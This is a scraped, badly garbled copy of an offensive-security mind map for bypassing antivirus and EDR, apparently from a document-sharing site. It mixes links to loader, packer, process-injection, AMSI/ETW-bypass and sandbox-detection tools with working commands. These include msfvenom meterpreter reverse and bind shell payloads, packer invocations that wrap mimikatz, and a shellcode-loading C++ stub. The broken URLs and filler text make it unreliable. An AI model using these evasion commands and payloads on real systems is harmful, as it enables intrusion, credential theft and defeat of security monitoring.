The Road
Uploaded by
steproclasterThe Road
Uploaded by
steproclasterwith suspended
Packing https://pentester.blog/?p=39 CRT
ttps://damonmohammadbagher.medium.com/
h
bypassing-anti-virus-by-creating-remote-thread-
Polymorph https://www.exploit-db.com/papers/13874
into-target-process-45f145b2ac7a
ttps://www.ired.team/offensive-security/
h
Signature hiding defense-evasion/av-bypass-with-metasploit- ttps://subscription.packtpub.com/book/
h
templates security/9781789610789/8/ch08lvl1sec50/
executing-the-inject-code-using-apc-queuing
ttps://improsec.com/tech-blog/bypassing-
h
ROP
control-flow-guard-on-windows-10-part-ii ttps://github.com/LloydLabs/
h
APC (Asyncronous Procedure Call)
ntqueueapcthreadex-ntdll-gadget-injection
ttps://joshpitts.medium.com/hooking-control-
h
flow-guard-cfg-for-fun-and-profit- ttps://decoded.avast.io/janvojtesek/raspberry-
h
31f951485545 robins-roshtyak-a-little-lesson-in-trickery/
CFG
ttps://citeseerx.ist.psu.edu/document?repid=
h
rep1&type=pdf&doi= ttps://www.ired.team/offensive-security/code-
h
ade1cc22ee994c1b353326ae4cedccd29f33b8d injection-process-injection/process-hollowing-
0 and-pe-image-relocations#relocation
Static Process hollowing
CFG flattening http://ac.inf.elte.hu/Vol_030_2009/003.pdf ttps://sevrosecurity.com/2020/04/08/
h
process-injection-part-1-createremotethread/
Pro tips : A shellcode sent in 3 open sources
ttps://learn.microsoft.com/en-us/dotnet/
h
packer will have more chance to be caught than
Change logo/icon csharp/language-reference/compiler-options/
a manual obfuscation ttps://attack.mitre.org/techniques/T1055/
h
resources?redirectedfrom=MSDN Thread execution hijacking
003/
Change date of compilation
fdsfsdfs https://github.com/TheD1rkMtr/D1rkLrd
ttps://rastamouse.me/memory-patching-amsi-
h
PSC (Ptrace System Calls)
bypass/
https://github.com/xuanxuan0/DripLoader ttps://thehackernews.com/2017/12/malware-
h
C++ Process Doppelganging
sec.co.uk/2018/06/exploring- process-doppelganging.html
https://github.com/Hagrid29/PELoaderBypass AMSI -and-logging-evasion/
ttps://disman.tl/2015/01/30/an-improved-
h
ttps://www.pentestpartners.com/security-
h Reflective dll injection
reflective-dll-injection-technique.html
blog/patchless-amsi-bypass-using-sharpblock/
python https://github.com/icyguider/Shhhloader https://github.com/fancycode/MemoryModule
Description
https://github.com/cribdragg3r/Alaris
C2 by DNS Dll injection https://www.ired.team/offensive-security/code-
injection-process-injection/dll-injection
C https://github.com/trustedsec/COFFLoader
Network P2P (hide ip from C2)
ttps://book.hacktricks.xyz/windows-
h
ttps://github.com/CMEPW/Selha/blob/main/
h DLL Sideloading & Proxying hardening/windows-av-bypass#dll-sideloading-
C/aes-loader-stageless.c HTTPS
and-proxying
ttps://medium.com/@merasor07/av-edr-
h
https://github.com/aeverj/NimShellCodeLoader evasion-using-direct-system-calls-user-mode- ou put your region in RW, you write your
Y
Nim vs-kernel-mode-fad2fdfed01a shellcode, then you reprotect in RX, then you
Direct syscalls RWX
ttps://github.com/sh3d0ww01f/nim_
h run the thread. This way your region is never in
shellloader https://thewover.github.io/Dynamic-Invoke/ rwx
ttps://www.purpl3f0xsecur1ty.tech/2021/03/
h
https://github.com/EddieIvan01/gld WaitForSingleObjectEx
30/av_evasion.html ttps://www.mdsec.co.uk/2022/04/process-
h
Go dynamic injection-via-component-object-model-com-
https://github.com/zha0gongz1/DesertFox Foliage irundowndocallback/
COM Hijack Dll
https://evasions.checkpoint.com/techniques/
Delayed execution https://0xpat.github.io/Abusing_COM_Objects/
small sleep obfuscation technique that uses
A timing.html#delayed-execution
https://github.com/b1tg/rs_shellcode Ekko
CreateTimerQueueTimer Win32 API Exe
ttps://github.com/S4ntiagoP/donut/tree/
h
Rust https://github.com/r4ime/shellcode_loader ttps://www.cyberbit.com/blog/endpoint-
h syscalls
ttps://github.com/janoglezcampos/
h
Remote thread security/malware-mitigation-when-direct-
dfsdfsf
https://github.com/cr7pt0pl4gu3/Pestilence
Deathsleep
DeathSleep
system-calls-are-used/
Hta
https://blog.securityevaluators.com/creating-
< ttps://github.com/hasherezade/pe_to_
h
C++ dsec.co.uk/2020/03/hiding-
av-resistant-malware-part-1-7604b83ea0c0 shellcode Cpl
Crystal
OH FFWKLFWFWFW User APC
ttps://www.cyberbit.com/endpoint-security/
h
malware-mitigation-when-direct-system-calls-
C https://github.com/reveng007/ReflectiveNtdll TheWover/DInvoke are-used/ https://github.com/monoxgas/sRDI Link
Bypass AV/EDR Dropper Manual loader Automatic loader Generate shellcode Manual obfuscation Automatic obfuscation Process injection Detect virtual machines (Sandbox) From PE to shellcode From alive beacon Extensions
include <iostream>
# sfvenom -p windows/x64/meterpreter/
m https://github.com/sevagas/macro_pack Count processus number if >=40 its probably not a VM Havoc dotnet (object file)
#include <Windows.h> reverse_tcp LHOST=<SERVER> LPORT=< Office macro
PORT> -f raw https://github.com/optiv/Ivy User interaction Send MessageBoxW
int main(void) { From .net to BoF https://github.com/CCob/BOF.NET
. 1 allocating memory
.2 moving shellcode into that memory HMODULE hMod = LoadLibrary("shellcode. sfvenom -p windows/meterpreter/reverse_
m https://github.com/phra/PEzor Software Check for internet Cobalt BoF (Beacon object file)
dll"); msfvenom tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt- ttps://github.com/trustedsec/CS-Situational-
h
.3 executing the shellcode C
if (hMod == nullptr) { key thisisakey -f dll Awareness-BOF
https://github.com/klezVirus/inceptor Datetime on compilation
cout << "Failed to load shellcode.dll" << endl;
} sfvenom -p windows/meterpreter/bind_tcp -e
m Packing https://github.com/govolution/avet Check for Computer name VM = DESKTOP-[0-9A-Z]{7}
x86/shikata_ga_nai '\x00' -i 30 RHOST=10.0.0.
return 0; 68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more https://github.com/Nariod/RustPacker
} ttps://github.com/CMEPW/bof-collection/
h
CPUID timing
blob/main/src/checkVM/checkVM2.c
C2 (Cobalt/Havoc what ever) ttps://github.com/DavidBuchanan314/
h
@Jenaye_fr ttps://medium.com/securebit/bypassing-av-
h monomorph Hardware
ypical user workstation has a processor with
T
through-metasploit-loader-64-bit-
LeDocteurDesBits at least 2 cores, a minimum of 2 GB of RAM
9abe55e3e0c8 ttps://nytrosecurity.com/2019/06/30/writing-
h https://github.com/upx/upx
C++ ASM and a 100 GB hard drive
Crédits shellcodes-for-windows-x64/
michmich1000 ttps://github.com/ReversingID/Shellcode-
h https://github.com/EgeBalci/sgn/
Loader/tree/master/windows ttps://evasions.checkpoint.com/techniques/
h
@Zabannn ine hyperion.exe /root/payloads/shellter/
w OSX
Hyperion https://github.com/CCob/SharpBlock macos.html#macos-sandbox-methods
shellter_putty_reverse_x86.exe
ttps://sevrosecurity.com/2019/05/25/bypass-
h
.NET ttps://github.com/danielbohannon/Invoke-
h
windows-defender-with-a-simple-shell-loader/ Tools https://github.com/a0rtega/pafish
ttps://vxug.fakedoma.in/papers/VXUG/
h Obfuscation
Static AMSI Bypass
Exclusive/
C
FromaCprojectthroughassemblytoshellcodeHas https://github.com/klezVirus/Chameleon
herezade.pdf
taged and stageless
S https://github.com/tokyoneon/Chimera
By definition, when we talk about staged we are
referring to a payload in addition to a piece This careCrow -I /Path/To/ShellCode -d facebook.
S
https://github.com/optiv/ScareCrow
means that there will be several actions (often com
2) between the client and the server. Signature hiding
https://github.com/paranoidninja/CarbonCopy
If you use meterpreter, please use the following
commands ttps://gist.github.com/snovvcrash/
h
LOLBIN RemComSvc
123945e8f06c7182769846265637fedb
set EnableStageEncoding true;
set StageEncoder x64/xor_dynamic; Entropy https://github.com/kleiton0x00/Shelltropy
https://github.com/optiv/ScareCrow
ttps://gist.github.com/tandasat/
h
e595c77c52e13aaee60e1e8b65d2ba32
Disable ETW
https://github.com/Soledge/BlockEtw
https://github.com/CCob/SharpBlock
reeze -I /PathToShellcode -encrypt -sandbox -
F
https://github.com/optiv/Freeze
o packed.exe
Type your text Ezor.sh -sgn -unhook -antidebug -text -
P
https://github.com/phra/PEzor syscalls -sleep=120 mimikatz/x64/mimikatz.
exe -z 2
Dynamic Indirect syscall
https://github.com/optiv/ScareCrow
https://github.com/klezVirus/SysWhispers3
https://github.com/jthuraisamy/SysWhispers2
Disable AV https://github.com/APTortellini/unDefender
Block DLL https://github.com/CCob/SharpBlock
Detect virtual machines https://github.com/a0rtega/pafish
You might also like
- D1 - Hiding in Plain Sight - Analyzing Recent Evolutions in Malware Loaders - Holger Unterbrink & Edmund Brumaghin PDFNo ratings yetD1 - Hiding in Plain Sight - Analyzing Recent Evolutions in Malware Loaders - Holger Unterbrink & Edmund Brumaghin PDF61 pages
- HTB BigHead Exploit - Small Buffer Exploit Without Egghunter InfoSec BlogNo ratings yetHTB BigHead Exploit - Small Buffer Exploit Without Egghunter InfoSec Blog8 pages
- Bypassing Antivirus With A Sharp Syringe: by Hasan Aka Inf0g33kNo ratings yetBypassing Antivirus With A Sharp Syringe: by Hasan Aka Inf0g33k12 pages
- Modifying A Tool To Make A PE Loader That Evades DefenderNo ratings yetModifying A Tool To Make A PE Loader That Evades Defender5 pages
- Atbash, Norton, and The Metasploit Reverse - Https HandlerNo ratings yetAtbash, Norton, and The Metasploit Reverse - Https Handler8 pages
- Bypass AV-EDR Solutions Combining Well Known TechniquesNo ratings yetBypass AV-EDR Solutions Combining Well Known Techniques42 pages
- Building A M Platform at Home 1739382859No ratings yetBuilding A M Platform at Home 173938285950 pages
- Reverse Engineering Malware For Newbies: A Guide For Those of You Who Want To Break Into The Fun World of MalwareNo ratings yetReverse Engineering Malware For Newbies: A Guide For Those of You Who Want To Break Into The Fun World of Malware35 pages
- Generating Malicious Payloads With MSFVenomNo ratings yetGenerating Malicious Payloads With MSFVenom1 page
- SLIDES - DevOps Red Team Initial Access MAASNo ratings yetSLIDES - DevOps Red Team Initial Access MAAS39 pages
- Reverse Engineering Malware: Hassen SaidiNo ratings yetReverse Engineering Malware: Hassen Saidi67 pages
- Antivirus Evasion With ShCoLo - ExLo - Why Malware Works in Face of Antivirus Software - Matthias DeegNo ratings yetAntivirus Evasion With ShCoLo - ExLo - Why Malware Works in Face of Antivirus Software - Matthias Deeg35 pages
- Zero Day Garden Windows Exploit Development Part 1No ratings yetZero Day Garden Windows Exploit Development Part 114 pages
- 2023-02-14 - Adopting Position Independent Shellcodes From Object Files in Memory For Threadless InjectionNo ratings yet2023-02-14 - Adopting Position Independent Shellcodes From Object Files in Memory For Threadless Injection8 pages
- VMM 2012 Powershell Cmdlets - : Get-Command - Module VirtualmachinemanagerNo ratings yetVMM 2012 Powershell Cmdlets - : Get-Command - Module Virtualmachinemanager3 pages
- أهمية العقيدة - الأنبا مكاريوس اسقف المنياNo ratings yetأهمية العقيدة - الأنبا مكاريوس اسقف المنيا29 pages
